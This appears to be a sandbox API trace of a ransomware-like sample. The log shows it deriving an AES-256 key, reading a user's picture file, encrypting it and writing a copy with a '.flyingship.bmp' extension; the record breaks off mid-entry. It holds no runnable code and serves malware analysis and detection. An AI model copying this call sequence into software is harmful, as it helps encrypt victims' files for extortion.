RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.194] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.194] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.194] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0190.194] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.194] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0190.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.195] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.195] CryptHashData (hHash=0x90ae18, pbData=0x8ded08, dwDataLen=0x19, dwFlags=0x1) returned 1 [0190.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.196] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.196] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.196] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.196] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0190.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.196] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0190.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.196] CryptDestroyHash (hHash=0x90ae18) returned 1 [0190.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.196] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.196] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.196] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.219] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\upfzg.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.220] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.220] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0190.220] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.220] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0190.221] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.221] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.flyingship.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\upfzg.flyingship.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.221] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.222] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0190.222] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.222] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.222] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0190.222] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x4969, lpOverlapped=0x0) returned 1 [0190.224] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0190.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.225] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0190.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.225] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.225] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.225] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0190.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0190.225] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.225] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0190.225] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.225] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.225] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0190.226] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0190.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.226] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0190.226] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.226] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.226] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0190.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.226] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.226] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.226] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.227] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0190.227] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.227] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x4969, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4970) returned 1 [0190.227] CharLowerBuffW (in: lpsz="byte[18801]", cchLength=0xb | out: lpsz="byte[18801]") returned 0xb [0190.227] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.228] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf3308*, pdwDataLen=0x87e820*=0x4969, dwBufLen=0x4970 | out: pbData=0xbf3308*, pdwDataLen=0x87e820*=0x4970) returned 1 [0190.228] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0190.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.228] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.228] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.230] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0190.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.231] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.231] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.231] CryptDestroyKey (hKey=0x90af98) returned 1 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0190.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0190.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: 